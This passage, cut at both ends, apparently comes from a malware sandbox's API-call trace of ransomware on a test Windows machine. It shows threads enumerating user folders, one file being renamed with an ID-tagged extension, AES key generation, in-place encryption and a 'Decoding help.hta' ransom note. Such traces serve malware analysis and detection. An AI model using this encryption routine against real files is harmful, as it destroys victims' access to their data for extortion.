(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.282] lstrcmpiW (lpString1="Decoding help.hta", lpString2="HUUPqiZJ.xls") returned -1 [0058.282] lstrlenW (lpString="HUUPqiZJ.xls") returned 12 [0058.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*" [0058.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*") returned 58 [0058.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\", lpString2="HUUPqiZJ.xls" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls" [0058.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls" [0058.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls.[ID]g9uZrLhJaygpwRm1[ID]" [0058.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nl8-tp3lig\\huupqizj.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nl8-tp3lig\\huupqizj.xls.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nl8-tp3lig\\huupqizj.xls.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa50 [0058.283] CreateFileMappingA (hFile=0xa50, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa54 [0058.283] CryptAcquireContextA (in: phProv=0x88cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x88cfcec*=0x3448c70) returned 1 [0060.192] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x88cfce8 | out: phKey=0x88cfce8*=0x42cf598) returned 1 [0060.192] CryptExportKey (in: hKey=0x42cf598, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x88cfbe4, pdwDataLen=0x88cfce4 | out: pbData=0x88cfbe4*, pdwDataLen=0x88cfce4*=0x2c) returned 1 [0060.192] MapViewOfFile (hFileMappingObject=0xa54, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x153c0) returned 0x39b0000 [0063.867] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88cfbe4*, pdwDataLen=0x88cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x88cfbe4*, pdwDataLen=0x88cfcf8*=0x100) returned 1 [0063.867] CryptEncrypt (in: hKey=0x42cf598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39b0000, pdwDataLen=0x88cfce4*=0x153c0, dwBufLen=0x153c0 | out: pbData=0x39b0000*, pdwDataLen=0x88cfce4*=0x153c0) returned 1 [0063.868] UnmapViewOfFile (lpBaseAddress=0x39b0000) returned 1 [0063.871] CloseHandle (hObject=0xa54) returned 1 [0063.871] CryptDestroyKey (hKey=0x42cf598) returned 1 [0063.871] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0063.871] SetFilePointerEx (in: hFile=0xa50, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.872] WriteFile (in: hFile=0xa50, lpBuffer=0x88cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x88cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x88cfbe4*, lpNumberOfBytesWritten=0x88cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.872] WriteFile (in: hFile=0xa50, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x88cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x88cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.874] CloseHandle (hObject=0xa50) returned 1 [0063.874] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\HUUPqiZJ.xls.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.874] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x88cfd30 | out: lpFindFileData=0x88cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x846ec760, ftCreationTime.dwHighDateTime=0x1d4d566, ftLastAccessTime.dwLowDateTime=0x5a245f40, ftLastAccessTime.dwHighDateTime=0x1d4d329, ftLastWriteTime.dwLowDateTime=0x5a245f40, ftLastWriteTime.dwHighDateTime=0x1d4d329, nFileSizeHigh=0x0, nFileSizeLow=0x13fe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="IquFzoHrtZAdwdkJC.odt", cAlternateFileName="IQUFZO~1.ODT")) returned 1 Thread: id = 647 os_tid = 0xe60 [0054.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*", lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8010 [0055.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.541] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.541] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.541] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0055.541] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0055.541] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0055.541] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0055.542] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0055.542] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned 59 [0055.542] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat" [0055.542] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*.*" [0055.542] GlobalMemoryStatus (in: lpBuffer=0xc18fd10 | out: lpBuffer=0xc18fd10) [0055.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6d00c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0055.764] CloseHandle (hObject=0x834) returned 1 [0055.764] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0055.764] lstrcmpW (lpString1=".", lpString2="Flash Player") returned -1 [0055.764] lstrcmpW (lpString1="..", lpString2="Flash Player") returned -1 [0055.764] lstrcmpiW (lpString1="windows", lpString2="Flash Player") returned 1 [0055.766] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0055.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned 59 [0055.766] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player" [0055.766] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*" [0055.767] GlobalMemoryStatus (in: lpBuffer=0xc18fd10 | out: lpBuffer=0xc18fd10) [0055.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a948a70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0055.781] CloseHandle (hObject=0x834) returned 1 [0055.781] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0055.781] lstrcmpW (lpString1=".", lpString2="Headlights") returned -1 [0055.781] lstrcmpW (lpString1="..", lpString2="Headlights") returned -1 [0055.781] lstrcmpiW (lpString1="windows", lpString2="Headlights") returned 1 [0055.783] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0055.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned 59 [0055.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Headlights" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights" [0055.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*.*" [0055.783] GlobalMemoryStatus (in: lpBuffer=0xc18fd10 | out: lpBuffer=0xc18fd10) [0055.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a998bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0055.795] CloseHandle (hObject=0x834) returned 1 [0055.795] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0055.795] lstrcmpW (lpString1=".", lpString2="Linguistics") returned -1 [0055.795] lstrcmpW (lpString1="..", lpString2="Linguistics") returned -1 [0055.795] lstrcmpiW (lpString1="windows", lpString2="Linguistics") returned 1 [0055.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0055.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned 59 [0055.795] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics" [0055.795] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*" [0055.795] GlobalMemoryStatus (in: lpBuffer=0xc18fd10 | out: lpBuffer=0xc18fd10) [0055.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9912a50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0055.804] CloseHandle (hObject=0x834) returned 1 [0055.804] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0055.804] lstrcmpW (lpString1=".", lpString2="LogTransport2") returned -1 [0055.804] lstrcmpW (lpString1="..", lpString2="LogTransport2") returned -1 [0055.804] lstrcmpiW (lpString1="windows", lpString2="LogTransport2") returned 1 [0055.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0055.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned 59 [0055.807] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2" [0055.807] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*.*" [0055.807] GlobalMemoryStatus (in: lpBuffer=0xc18fd10 | out: lpBuffer=0xc18fd10) [0055.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9f8d50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0055.832] CloseHandle (hObject=0x834) returned 1 [0055.832] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0xc18fd30 | out: lpFindFileData=0xc18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 0 [0055.832] FindClose (in: hFindFile=0x5d8010 | out: hFindFile=0x5d8010) returned 1 Thread: id = 648 os_tid = 0xe64 [0049.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*", lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db3b8 [0049.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.048] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.048] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.048] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrome", cAlternateFileName="")) returned 1 [0049.048] lstrcmpW (lpString1=".", lpString2="Chrome") returned -1 [0049.048] lstrcmpW (lpString1="..", lpString2="Chrome") returned -1 [0049.048] lstrcmpiW (lpString1="windows", lpString2="Chrome") returned 1 [0049.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*" [0049.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*") returned 58 [0049.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", lpString2="Chrome" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0049.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*" [0049.048] GlobalMemoryStatus (in: lpBuffer=0xd18fd10 | out: lpBuffer=0xd18fd10) [0049.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97923d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.056] CloseHandle (hObject=0x540) returned 1 [0049.056] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0049.056] lstrcmpW (lpString1=".", lpString2="CrashReports") returned -1 [0049.056] lstrcmpW (lpString1="..", lpString2="CrashReports") returned -1 [0049.056] lstrcmpiW (lpString1="windows", lpString2="CrashReports") returned 1 [0049.056] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*" [0049.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*") returned 58 [0049.057] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", lpString2="CrashReports" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports" [0049.057] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*.*" [0049.057] GlobalMemoryStatus (in: lpBuffer=0xd18fd10 | out: lpBuffer=0xd18fd10) [0049.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109d09b8, 